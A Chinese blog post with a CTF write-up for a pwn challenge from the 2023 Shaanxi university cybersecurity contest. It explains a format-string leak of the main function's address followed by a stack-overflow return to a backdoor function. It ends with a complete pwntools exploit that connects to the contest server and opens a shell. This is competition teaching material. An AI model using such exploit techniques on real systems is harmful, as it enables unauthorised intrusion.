2023陕西省大学生网络安全技能大赛pwn陕西游玩题解

已于 2023-06-04 23:13:23 修改
阅读量250 收藏 1
点赞数
分类专栏: pwn 文章标签: python
于 2023-06-04 10:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ctfpwn/article/details/131029239
版权

首先checksec~

af573347a48e41f0a0ec0443e85ba995.png

发现开了pie

然后ida看看

96ebb30db662455e8352306db1174519.png

 

3156de2718fe4ce2abc3179e6c290b32.png

55b247566c5f4ac9863fe73b61b803ea.png

可以看到输入1是一个栈溢出,输入2有一个格式化字符串

而且还找到了后门函数

8a1e874b15314f7a8345c5975c37bbf2.png

那么我们就要想办法泄露出一个函数真实地址,以此来计算偏移得到后门函数的地址从而getshell

gdb调试:

在printf处下一个断点,再输入一串%p

4de717c844bb4bb5ac37a231f2510769.png

 

 接着回车之后看下栈

 4b60c0f9a73942e598684ebf1b92cad1.png

 可以发现在0x7fffffffdf18处存放了main函数的地址,而printf输入时的位置在0x7fffffffdeb0,并且64位传参前6个参数要放在寄存器中,那么实际main函数真实地址相对格式化字符串参数的位置为(0x7fffffffdf18-0x7fffffffdeb0)/8+6=19

接着计算main与后门函数的偏移,直接ida看后四位再相减就欧克了,代码如下

io.recvuntil('Your choice :\n')
io.sendline('2')
payload = '%19$p'
io.sendlineafter('\n',payload)
addr = int(io.recv(16).decode(),16)
print(addr)
main = 0x12EB
shell = 0x129A
offset = main-shell
shelladr = addr-offset

 然后就是愉快的ret2text过程。完整exp如下

from pwn import*
#context.log_level = 'debug'
io = remote('121.196.192.181', 10001)
io.recvuntil('Your choice :\n')
io.sendline('2')
payload = '%19$p'
io.sendlineafter('\n',payload)
addr = int(io.recv(16).decode(),16)
print(addr)
main = 0x12EB
shell = 0x129A
offset = main-shell
shelladr = addr-offset
io.sendlineafter('Your choice :\n','1')
io.recvuntil('Mountain')
payload = b'a'*(0x28)+p64(shelladr)

io.sendline(payload)
io.interactive()
 

 希望对各位有所帮助。

 

 

rbp
关注
专栏目录
2024第八届全国职工职业技能大赛“网络与信息安全管理员”河北省预选拔赛解析
Aluxian_的博客
08-03 1050
2024第八届全国职工职业技能大赛“网络与信息安全管理员”某省选拔赛解析
2023第三届陕西省大学生网络安全技能大赛--本科高校组 Reverse题解
OrientalGlass的博客
06-03 4609
这次比赛总体感觉很好,比前几天黑盾杯和国赛坐牢要好太多,虽然一些题目没见过,但是在网上查一下就能找到相关文章和工具还要重视理论知识水平,不能做脚本小子,这些题目虽然有现成的工具做,但还是要了解一下相关原理,不然下次变一下就呆住了.例如这个的babypython,以前都是用工具或者脚本直接干pyc文件,这次只能生啃字节码(还好有gpt强大的分析能力),甚至还有很多混淆和跳转代码,也是锻炼到了啃字节码的能力另一方面,个人的经验还是不足,还要继续多做题,多比赛,多复现,勤能补拙。
2023第三届陕西省大学生网络安全技能大赛 MISC PWN RE
weixin_51890658的博客
07-28 318
直接放进010分析,key1已知,但有坑,有两个key2,pe⽂件尾部为真,最后拼接获得flag flag is flag{key1_key2},but where is the key?下载得到压缩包,爆破得到密码258369,得到流量包和图⽚ Wireshark打开,题⽬提示dns,过滤dns,发现test.com前⾯有字符,打印出hex值转字符,,发现维吉 尼亚密码,求密钥。假:key2:PE_sT3uctU3e_1$ 真:key2:PE_sT3uctU3e_1$_suBt1e flag{w0w!
第三届陕西省大学生网络安全技能大赛部分WriteUp
Geek极安云科-致力于网络安全事业
06-05 1043
目录扫描发现robots.txt文件,访问/sub
ciscn2021 西北分区赛部分pwn
mishixiaodai的博客
06-07 282
xb_pwn_easy 分析发现是道整数溢出的题,unsigned int8最大数为255,当输入的数字超出255时就会发生溢出。但当时做题我将v4输为0,也可以造成溢出,原因是read的第三个参数v4-1=-1,又read的第三个参数类型是size_t,当输入负值时,会将其转换为无符号数。 利用整数溢出漏洞,可以覆盖age、email、phone,可以将email覆盖为函数的got地址,这样就可以获得函数的地址并且得到libc的基地址。 修改puts函数的got表。一开始我将phone覆盖为puts_
[2023第三届陕西省大学生网络安全技能大赛--职业院校组] ezMath
weixin_52640415的博客
06-03 359
divisors 求因子函数 resultant 方法消元
【广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2506
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
2020第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
【标题】: 2020第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 【描述】: 这个压缩包文件包含了2020第六届“湖湘杯”网络安全技能大赛洞庭决赛中,互联网选拔赛第二场的线上CTF...
2021“绿城杯”网络安全大赛
09-30
通过参与此类比赛,参赛者不仅能够提升自身的安全技能,还能了解最新的安全威胁趋势,增强实战经验。同时,这种竞赛也有助于促进网络安全社区的交流和学习,推动整个行业的进步。2021“绿城杯”网络安全大赛提供的...
CTF--2016湖湘杯全国网络安全技能大赛之栈溢出pwnme
关注互联网安全的小虾米一枚
03-30 6612
0x01 基础知识 本题目考察逆向分析,漏洞挖掘以及利用能力。 学习本篇技术,提前储备好栈溢出相关知识。 关键技术点 scanf函数溢出漏洞 0x02 基本分析 拿到题目先对其进行基本分析,使用工具checksec.sh脚本检测。 根据这个判断程序运行在32位系统之上。没有开启canary和nx保护。 猜测题目考察内容多为溢出漏洞。运行程序
python GUI编码入门-21】如何用Tkinter创建一个记事本应用
木头大左的博客
11-08 53
在现代编程环境中,图形用户界面(GUI)应用程序的开发变得越来越重要。Python的Tkinter库是一个功能强大且易于使用的GUI工具包,非常适合初学者和有经验的开发者使用。本文将详细介绍如何使用Tkinter创建一个简易的记事本应用,涵盖从安装到实现各项功能的全过程。Tkinter是Python的标准GUI库,它提供了丰富的接口来创建窗口、对话框、按钮等常见的GUI组件。Tkinter具有良好的跨平台性,可以在Windows、Mac OS和Linux上运行。
一次薅国家超算平台的记录
weixin_55179972的博客
11-07 407
参与 谁是下一个“AI”跃人 -AI体验推介活动,赢取千元算力券!(https://www.scnet.cn/home/subject/modular/index270.html)2. Clone开源的Llama3 Chinese (https://github.com/LlamaFamily/Llama-Chinese)活动名称主题:国家超算互联网「AI跃升季」:谁是下一个“AI”跃人 - AI算力体验活动。其中位置1,2替换为商品基模型和训练出来的微调模型。模型改为商城下载的模型。2、运行的过程记录。
推荐一款管道数据检索工具:Pipedata-Pro
11-09 353
是一款专为设计石油、天然气、水和蒸汽管道及管道系统的工程师开发的应用程序。该应用程序提供了设计管道系统所需的工程数据,拥有一个全面的管道类型、配件和材料。
大模型落地之ollama控制设备
weixin_44772948的博客
11-10 78
本地环境:ollama3.2(理论上ollama3.1以上就支持tool功能,但是笔者没有试过)(PS:不足点,在输入不是控制指令的相关问题时,大概率也会调用工具,需要后续调优)
Golang--文件操作
cookies_s_的博客
11-07 431
文件操作
Python 中测试函数调用顺序
weixin_44617651的博客
11-08 297
Python 中测试函数调用顺序是一个常见的需求。例如,您可能有一个对象 ​​Obj​​,其中包含三个方法:​​method1​​、​​method2​​ 和 ​​method3​​。您还编写了一个函数 ​​do_something​​,该函数调用这些方法。您想编写一个测试来测试 ​​do_something​​ 函数和 ​​Obj​​ 对象。但是,您不想直接模拟或改变 ​​Obj​​ 对象的行为。您需要一种方法来获取在 ​​obj​​ 对象上调用的方法列表,而无需更改其行为。
【优雅的在Java程序中判空和Null】
最新发布
在这个充满危险的乱世之中,只有学会烤鸡才能顽强的活下去。
11-10 85
在Entity中添加。
用于图像识别的判别图正则化技术
博客之路,前途漫漫
11-08 1793
MNIST手写数字识别数据集是目前最经典的图像识别数据集,其中包括70000张图片样本,其中60000张作为训练集,10000张作为测试集。ORL(Olivetti Research Laboratory)人脸识别数据集由剑桥大学计算机实验室的Olivetti研究实验室于1992创建,包含40个人的面部图像,图像尺寸为92x112像素,灰度图像。每个人的图像在时间上有不同间隔,包含不同的光照条件、面部表情和细微变化,图像格式为PGM,按照人物ID分类存储。
大学生网络安全挑战赛“东华杯”2021CTF真题解
资源摘要信息:"东华杯”2021大学生网络安全邀请赛是针对在校大学生网络安全竞赛活动,以CTF(Capture The Flag,夺旗赛)形式进行。CTF是一种信息安全竞赛,参赛者需要解决一系列网络安全、系统安全、密码学、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值